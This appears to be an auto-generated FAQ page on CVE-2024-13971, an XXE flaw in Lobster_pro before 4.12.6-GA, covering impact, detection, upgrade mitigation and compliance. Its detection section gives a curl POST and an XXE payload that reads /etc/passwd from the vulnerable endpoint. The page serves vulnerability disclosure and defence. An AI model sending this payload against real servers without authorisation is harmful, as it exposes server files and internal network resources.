Can you explain this vulnerability to me?

CVE-2024-13971 is a vulnerability in the XML parser functionality of Lobster_pro software versions prior to 4.12.6-GA. It allows unauthenticated attackers to exploit improper restriction of XML External Entity (XXE) references. By sending specially crafted XML payloads to the vulnerable endpoint, attackers can read files on the application server and adjacent network shares.

The vulnerability also enables attackers to perform HTTP GET requests to arbitrary services, conduct server-side request forgery (SSRF), exfiltrate data out-of-band, and potentially leak NTLM hashes via SMB. This occurs because the XML parser processes external DTD references without proper validation.

Useful 0 Not Useful 0

How can this vulnerability impact me? :

This vulnerability can have serious impacts including unauthorized disclosure of sensitive files on the application server and connected network shares. Attackers can gain access to confidential information that should be protected.

Additionally, attackers can perform HTTP GET requests to arbitrary services, potentially allowing them to pivot within the network or interact with internal systems that are not normally accessible externally.

The vulnerability also enables server-side request forgery (SSRF), which can be used to bypass firewalls or access internal resources, and may lead to leakage of NTLM hashes, increasing the risk of further compromise.

Useful 0 Not Useful 0

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by testing the endpoint https://<lobster-pro instance>:443/system/web which processes XML via HTTP POST requests. By sending a crafted XML payload that includes an external DTD reference, you can check if the server returns error messages containing file contents or directory listings, indicating susceptibility to XML External Entity (XXE) attacks.

Detection involves sending a specially crafted XML payload to the vulnerable endpoint and observing the response for sensitive data leakage or error messages that reveal file contents.

Example commands to test this might include using curl to POST an XML payload:

• curl -k -X POST https://<lobster-pro instance>:443/system/web -H "Content-Type: application/xml" -d @payload.xml

Where payload.xml contains an XML with an external entity referencing a local file, such as:

• <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

If the response contains contents of the referenced file or error messages revealing file paths, the system is vulnerable.

Useful 0 Not Useful 0

What immediate steps should I take to mitigate this vulnerability?

The immediate and recommended mitigation step is to update Lobster_pro to version 4.12.6-GA or later, where this vulnerability has been fixed.

Until the update can be applied, consider restricting access to the vulnerable endpoint and monitoring for suspicious POST requests containing XML payloads.

Additionally, network-level controls to block unauthorized access to the application server and adjacent network shares can help reduce risk.

Useful 0 Not Useful 0

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The vulnerability in Lobster_pro allows unauthenticated attackers to read sensitive files on the application server and adjacent network shares, as well as perform HTTP GET requests to arbitrary services. This can lead to unauthorized access and potential data leakage.

Such unauthorized access and data exposure could negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of sensitive data and prevention of unauthorized access.

However, the provided information does not explicitly discuss the direct impact on compliance with these standards.

Useful 0 Not Useful 0